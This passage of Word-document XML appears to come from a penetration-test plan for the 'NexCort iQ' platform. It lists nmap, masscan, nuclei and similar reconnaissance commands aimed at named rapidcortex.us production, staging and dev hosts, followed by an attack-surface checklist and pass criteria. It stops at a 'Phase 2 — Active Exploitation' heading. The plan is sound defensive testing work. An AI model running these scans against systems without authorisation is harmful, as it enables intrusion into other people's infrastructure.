          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU --top-ports 100 api.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># OS fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -O api.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Aggressive scan — version detection + scripts + traceroute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A -T4 api.rapidcortex.us app.rapidcortex.us www.rapidcortex.us</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan all NexCort iQ domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -p 80,443,8080,8443,8000,3000 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  app.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  www.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api-staging.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api-dev.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -oA rc-all-domains-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional Tools</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40"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="6120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fast large-range port scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">masscan -p0-65535 --rate=1000 {IP}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Shodan CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Passive recon — no traffic to target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="612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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">shodan host api.rapidcortex.us</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Naabu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fast port discovery (ProjectDiscovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">naabu -host api.rapidcortex.us -p -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Template-based CVE scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="612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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nuclei -u api.rapidcortex.us -t cves/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WhatWeb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Technology fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">whatweb api.rapidcortex.us</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Wafw00f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WAF detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="612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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wafw00f https://api.rapidcortex.us</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Attack Surface — What to Look For</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">API Gateway endpoints exposed beyond /api/* paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lambda function URLs accidentally left public (format: *.lambda-url.us-east-1.on.aws)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">S3 bucket endpoints resolving publicly — check for DirectoryBucketListing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CloudFront distributions with misconfigured origin access (direct S3 origin bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any port other than 443 responding on production domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALB or EC2 instances directly accessible, bypassing API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Development or staging environments accessible from public internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP ingest endpoint rate limiting — /api/cad/cap/ingest/{agencyId} is public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QR report endpoint — /api/report/{qrId} must load fast but not expose internal data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Only port 443 responds on production domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No S3 bucket URLs publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No Lambda function URLs publicly accessible without auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No ALB direct access bypassing API Gateway authorizer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All staging/dev environments require VPN or IP allowlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Active Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
